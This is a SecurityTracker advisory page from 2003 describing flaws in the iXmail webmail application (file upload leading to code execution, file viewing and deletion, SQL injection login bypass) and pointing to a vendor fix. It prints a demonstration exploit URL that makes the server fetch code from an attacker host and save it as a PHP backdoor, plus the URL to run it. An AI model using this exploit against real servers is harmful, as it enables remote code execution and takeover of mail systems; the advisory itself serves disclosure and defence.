SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   iXmail Vendors:   a-suivre.net
iXmail Bugs Let Remote Users Login, View and Delete Files, and Execute Arbitrary Commands on the System
SecurityTracker Alert ID:  1007054
SecurityTracker URL:  http://securitytracker.com/id/1007054
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 24 2003
Impact:   Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 0.2 beta, 0.3
Description:   Several vulnerabilities were reported in the iXmail web mail system. A remote user can upload files to the server and execute them. A remote user can also view or delete certain files on the server and inject SQL commands to gain authenticated access to the application.

Frog-m@n reported that a remote authenticated user can supply specially crafted '$attach1' and '$attach1_name' variables to the 'xmail_attach.php' script to upload arbitrary files to the system, including PHP files. A demonstration exploit URL is provided:

http://[target]/ixmail_attach.php?submit=1&attach1=http://[attacker]/badcode.txt&attach1_name=backdoor.php

In the above example, the 'badcode.txt' file will be written to the 'tmp' directory in the web document directory as the 'backdoor.php' file. The PHP code in 'backdoor.php' can then be executed (with the privileges of the web server) with the following type of URL:

http://[target]/tmp/backdoor.php

A remote authenticated user can also "upload" files that actually reside on the target server. In this manner, a local user can copy files in the installation directory (such as 'include/ixmail_config.inc.php') to the 'tmp' directory in the web document directory. This allows a local user to view ixmail configuration information, according to the report.

A vulnerability was reported in the 'ixmail_netattach.php' script. The script allows a remote authenticated user to delete certain files, such as scripts on the server.

An authentication vulnerability was reported in 'index.php'. If 'magic_quotes_gpc' is configured to be 'off' in the 'php.ini' configuration file, then a remote user can submit a specially crafted request to inject SQL commands to become authenticated on the application.

Impact:   A remote user can gain access to the application without authenticating.

A remote authenticated user can upload PHP code to the system and then execute the code with the privileges of the web server.

A remote authenticated user can delete files from the installation directory.

A remote authenticated user can view files in the installation directory.

Solution:   The vendor has released a fixed version (0.3 beta), available at:

http://www.a-suivre.net/ixmail/index2.php?page=download

Vendor URL:  www.a-suivre.net/ixmail/index2.php (Links to External Site)
Cause:   Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  iXmail


http://www.frog-man.org/tutos/iXmail.txt




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC